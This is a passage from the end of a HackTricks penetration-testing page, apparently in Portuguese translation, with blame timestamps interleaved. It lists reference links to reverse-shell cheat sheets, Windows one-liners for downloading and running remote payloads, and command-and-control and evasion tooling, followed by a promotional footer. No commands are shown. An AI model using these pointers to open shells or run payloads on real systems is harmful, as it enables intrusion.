* [https://highon.coffee/blog/reverse-shell-cheat-sheet/ ](https://highon.coffee/blog/reverse-shell-cheat-sheet/ )
* [https://gist.github.com/Arno0x ](https://gist.github.com/Arno0x )
* [https://github.com/GreatSCT/GreatSCT ](https://github.com/GreatSCT/GreatSCT )
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ ](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ )
* [https://www.hackingarticles.in/koadic-com-command-control-framework/ ](https://www.hackingarticles.in/koadic-com-command-control-framework/ )
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md )
2024-02-07 05:33:07 +00:00
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2022-10-27 23:22:18 +00:00
2024-03-14 23:33:23 +00:00
**Try Hard Security Group**
2024-03-26 15:44:24 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:33:23 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-07 05:33:07 +00:00
< summary > < strong > Aprenda hacking AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-12-30 22:28:51 +00:00
2024-03-09 13:28:56 +00:00
Outras formas de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
2024-03-24 12:25:47 +00:00
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , verifique os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
* Adquira o [**swag oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-03-26 15:44:24 +00:00
* Descubra [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-03-14 23:33:23 +00:00
* **Junte-se ao** 💬 [**grupo Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo telegram** ](https://t.me/peass ) ou nos siga no **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >